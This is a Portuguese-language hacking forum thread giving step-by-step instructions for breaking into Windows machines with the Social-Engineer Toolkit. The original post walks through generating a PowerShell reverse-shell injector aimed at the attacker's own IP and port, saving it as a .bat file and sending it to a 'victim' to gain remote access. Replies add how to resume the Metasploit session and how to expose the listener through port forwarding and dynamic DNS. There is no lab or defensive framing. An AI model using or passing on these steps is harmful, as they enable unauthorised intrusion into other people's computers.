Welcome to Shadow Network

Seja bem-vindo ao nosso fórum, registre-se para poder interagir em nosso fórum

tomz

[MALWARE]
Invasão Windows com SET

8 posts neste tópico

Salve,

Como usar a ferramenta SET (SET TOOL KIT) para invadir Windows.

Você ira precisar instalar a ferramenta SET no seu Kali.

Abra o terminal, vá até uma pasta de sua preferência para instalar o SET, e digite o seguinte comando:  git clone https://github.com/trustedsec/social-engineer-toolkit/ /set

Quando terminar, ainda dentro da mesma pasta digite: ./set/setup.py install

Após terminar é só dar o comando cd e abrir o SET digitando o comando: setoolkit

Agora com o SET aberto

tumblr_oibkt7uphf1runbmbo1_1280.png

Escolha a opção: 1) Social-engineering Attacks Digitando 1

tumblr_oibkydYndj1runbmbo1_1280.png

Em seguida escolha a opção: 9) Powershell Attack Vectors Digitando 9

tumblr_oibl4ehaLr1runbmbo1_1280.png

Agora nessa parte você escolherá a opção: 1) Powershell Alphanumeric Shellcode Injector Digitando 1

tumblr_oibl7tY3Id1runbmbo1_1280.png

Aqui ele diz pra você entrar com o seu IP ou DNS pra fazer um host reverso, digite o seu ip

tumblr_oiblc33ebT1runbmbo1_1280.png

Agora entre com a porta para conexão reversa (LEMBRANDO, SE VOCÊ FOR FAZER UMA CONEXÃO EXTERNA, ISTO É, FORA DA SUA REDE, VOCÊ PRECISARÁ ABRIR ESSA PORTA NO SEU MODEM PELO KALI LINUX, SE ABRIR USANDO O WINDOWS NÃO FUNCIONARÁ)

tumblr_oiblglzjXF1runbmbo1_1280.png

Nessa parte ele pergunta se você quer iniciar o "Ouvinte" que irá esperar a conexão reversa. Digite: yes

tumblr_oibll49DD71runbmbo1_1280.png

Bom, aqui ele já esta esperando a conexão acontecer, agora vou dizer como vocês vão pegar o arquivo e mandar pra mandar pra pessoa.

Abra outro terminal (Ctrl+Shift+n), e Digite o seguinte comando: cd /root/.set/reports/powershell

tumblr_oibm2uPooi1runbmbo1_1280.png

Você vai entrar no diretório onde foi criado o arquivo feito pelo SET

Agora digite o comando: cp x86_powershell_injection.txt /root/Desktop/NOME_DO_ARQUIVO.bat

Agora que o arquivo está na area de trabalho do seu Kali, você pode mandar pra pessoa, quando ela abrir, aquele outro terminal vai estabelecer a conexão e você já estará dentro do windows da "Vítima".

tumblr_oibmcoeOzc1runbmbo1_1280.png

Para saber os comandos digite: ?

E lembrando -> 

Pra você conseguir uma conexão com quem não está na sua rede (wifi por exemplo) você vai ter que:

Abrir a porta usada (no meu caso foi a 4444) do seu modem PELO KALI, e criar um dns dinâmico (use o site www.noip.com pra isso).

Valeu galera, deixe sua crítica :')

 

Tomz

8

Compartilhar este post


Link para o post
Compartilhar em outros sites

e se eu fechar essa tela do terminal, eu perco a conexao com a vitima, ou tem algum comando pra eu poder abrir o terminal dnv e reconectar?

0

Compartilhar este post


Link para o post
Compartilhar em outros sites

@DayDreamSe você fechar o terminal, basta digitar o comando no msfconsole session -i -1 depois de ter usado o LHOST, LPORT, SET PAYLOAD de novo.

@Edit O comando é sessions -i -1 Esqueci do "s"

Editado por tomz
2

Compartilhar este post


Link para o post
Compartilhar em outros sites

Uma duvida bem ridicula, eu não teria que usar o no ip no kali linux?

0

Compartilhar este post


Link para o post
Compartilhar em outros sites

@Snizi Isso é preferencial amigo, mas a certeza é que você vai ter que abrir as portas pelo Kali, e o ip que você vai ter que setar no LHOST é o ip do site www.meuip.com, que vai ter que ver dentro do Kali também. Agora... se você prefere colocar o ip ou DNS , é contigo :) Dá um repzinho se fui útil.

4

Compartilhar este post


Link para o post
Compartilhar em outros sites

Crie uma conta ou entre para comentar

Você precisar ser um membro para fazer um comentário

Criar uma conta

Crie uma nova conta em nossa comunidade. É fácil!


Crie uma nova conta

Entrar

Já tem uma conta? Faça o login.


Entrar Agora

Shadow Network

Seja Bem-Vindo ao nosso fórum, construído com o intuito de compartilhar idéias e conhecimentos ao alcance de qualquer pessoa que tenha vontade de aprender.

Atencao

Em caso de bugs/erros no forum, entre em contato com algum membro da equipe.